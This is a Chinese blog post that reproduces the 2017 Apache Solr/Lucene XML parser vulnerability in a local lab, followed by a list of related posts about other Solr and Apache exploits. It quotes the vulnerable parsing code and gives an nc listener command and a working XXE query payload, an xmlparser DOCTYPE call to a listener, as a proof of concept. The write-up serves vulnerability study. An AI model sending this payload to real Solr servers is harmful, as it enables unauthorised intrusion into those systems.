Apache Solr/Lucene 0Day远程代码执行漏洞复现

最新推荐文章于 2024-08-02 20:00:00 发布
最新推荐文章于 2024-08-02 20:00:00 发布
阅读量2.1k 收藏
点赞数
分类专栏: 漏洞验证
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/skyxxb/article/details/78260395
版权

最近发现网络上Apache Solr/Lucene 存在远程代码执行漏洞,现进行复现。

1.存在位置

根据漏洞详细报告,在/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java 

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
      db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
      throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
      doc = db.parse(pXmlFile);
    }

可以调用xmlparser解释器访问远程url数据,攻击者可以利用其执行任意代码。

2.环境搭建

实验使用:
- Apache Solr 6.0(之前尝试6.6版本未成功)
- Windows 7

1.下载solr
2.启动solr
cd bin
solr start

访问:
http://localhost:8983/solr/#/
页面正常显示数据即成功

3. 新建core(命名为“test”)
solr stop -all
solr -e test

成功后进入

http://localhost:8983/solr/#/

我们在core admin中就可以看到创建的test

3.漏洞复现

1.启动nc 监听4444端口

nc -lvp 4444

2.访问

http://localhost:8983/solr/test/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}

3.nc中可以看到solr访问4444端口即证明漏洞存在

这里写图片描述

参考:
http://lucene.472066.n3.nabble.com/Re-Several-critical-vulnerabilities-discovered-in-Apache-Solr-XXE-amp-RCE-td4358308.html

skyxxb
关注
专栏目录
Apache Solr 远程命令执行漏洞(CVE-2017-12629)
千寻的博客
03-23 1255
Config API默认是开启的,使得攻击者可以从远程位置上传配置文件到 Solr 服务器上。 * 一个制定的请求可以控制 Solr 服务器上的` Core 配置`文件,其中包括对 Solr Core 的`安全性`和`资源限制`的许多设置。 * 由于缺乏`身份验证和授权机制`,攻击者可以`配置设置`,执行任意命令,命令是在具有系统权限的 Solr 服务器上执行的.
SpringBoot Starter Solr Search Engine Support
程序员光剑
07-29 1022
2019年是搜索引擎热潮的开始。近几年,开源社区不断涌现出众多优秀的搜索引擎系统,如ElasticSearch、Solr等。与此同时,Spring Framework也迎来了对搜索引擎整合的新浪潮,通过Spring Data JPA/Hibernate Search或Spring Data Elasticsearch可以轻松实现基于Lucene、Elasticsearch或其他搜索引擎的集成。因此,越来越多的开发者开始关注并选择这些搜索引擎作为自己的后端数据存储方案。
漏洞复现Apache solr
最新发布
weixin_68416970的博客
08-02 359
漏洞复现Apache solrApache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台
其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193)
网络安全领域___专研者.
05-12 1006
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
weixin_44047654的博客
03-03 1732
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
黑客瞄准 Apache Solr 漏洞
Linuxprobe18的博客
03-14 1005
导读2月底,黑客攻击了1400多台Apache Solr服务器来安装一个加密货币矿工软件。对Apache Solr服务器的攻击与1月份发生的一件事情类似,黑客利用未打补丁的Oracle WebLogic实例安装采矿设备来获得比特币替代品Monero。Apache Solr攻击者正在使用远程代码执行漏洞Apache软件基金会在10月份发布了一个修补漏洞的补丁。Solr是一个广泛使用的Apache程...
Apache Solr Velocity模板远程代码执行复现
Sylon的博客
10-31 1099
0x01漏洞描述 2019年10月31日,国外安全研究员s00py在Github公开了一个Apache Solr Velocity模板注入远程命令执行的poc。 经过研究,发现该0day漏洞真实有效并且可以攻击最新版本(8.2.0)的Solr。 0x02CVE编号 无 0x03漏洞等级 高危 0x04影响范围 包括但不限于8.2.0 0x05漏洞复现 1)首先 下载Solr的...
solr搜索入门文档 原理-搭建-使用细节
07-20
Solr是基于Apache Lucene的开源全文搜索引擎,它提供了分布式、可扩展且高度可配置的搜索和分析平台。本文将围绕“solr搜索入门文档”的主题,深入探讨Solr的基本原理、搭建步骤以及使用细节。 一、Solr原理 1. ...
Solr -- 查询语法/参数
热门推荐
Nireus的博客
05-27 4万+
1. 常用查询参数 参数 描述 defType 指定用于处理查询语句(参数q的内容)的查询解析器,eg:defType=lucene sort 指定响应的排序方式:升序asc或降序desc.同时需要指定按哪个字段进行排序。eg: sort=price desc,score asc start 指定显示查询结果的开始位置,默认是0 rows 指定一次显示多少行查询
漏洞复现-solr-命令执行】vulfocus/solr-cve_2019_17558
10-15 2314
solr-命令执行】接口、配置文件
Apache Solr 远程命令执行
m0_63241485的博客
08-28 957
命令执行漏洞
Apache 紧急修复已遭利用且补丁不完整的 HTTP Server 0day
smellycat000的专栏
10-08 268
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现此前 Apache 发布的安全更新未能正确修复已遭利用的 0day (CVE-2021-41773),Apache 软件基金...
Apache HTTP Server路径遍历漏洞复现0day(CVE-2021-41773|CVE-2021-42013远程代码执行
内心不种满鲜花就会长满杂草
10-09 5525
声明:请勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全法 漏洞描述 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。 fofa查询:server=.
Apache Solr远程命令执行漏洞复现 (CVE-2019-0193,docker 搭建)
suqiban7253的博客
03-14 279
这里写自定义目录标题0x00漏洞简介0x01 漏洞概述0x02影响范围0x03环境搭建0x04漏洞复现0x05 遇到的问题0x06参考 0x00漏洞简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 0x01 漏洞概述 该漏洞的产生是由于两方面的原因: 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节
solr漏洞合集
weixin_46626737的博客
07-02 934
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行(CVE-2017-12629)5.solr的XXE漏洞(CVE-2017-12629)2.solr远程代码执行(CVE-2019-0193)漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。
漏洞复现:(0dayApache Solr 任意文件读取漏洞
New Wh1te Hat
03-18 726
一、漏洞简介 Solr Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 特点 Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。同时对其进行了扩展,提供了比Lucene更为丰富的查询语言,同时实现了可配置、可扩展并对查询性能进行了优化,并且提供了一个完善的功能管理界面,是一款非常优
Lucene的缺点
tao_wei162的博客
01-13 1001
对那些刚接触Lucene的人来说,这里是使用它的关键:Apache Lucene是一个由java编写的高性能,全方位的单词搜索引擎库。在批评它之前,我必须承认Lucene是一个高性能的划词搜索引擎。几年来,Lucene已经被看作是用java编写的嵌入式搜索引擎中的一等公民。它的声誉每日剧增,并且仍然是开源java搜索引擎中的最佳。每个人都在说:“Doug Cutting做了一项伟大的工作”。然...
0day漏洞
xiangxiangfeiba的专栏
01-07 1823
在信息安全意义上,0Day是指在安全补丁发布前被了解和掌握的漏洞信息,它们可以被黑客或犯罪分子用来攻击企业或个人系统、盗取或改变资料,而由于彻底的安全措施尚未到位,被攻击者几乎无法防范。 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值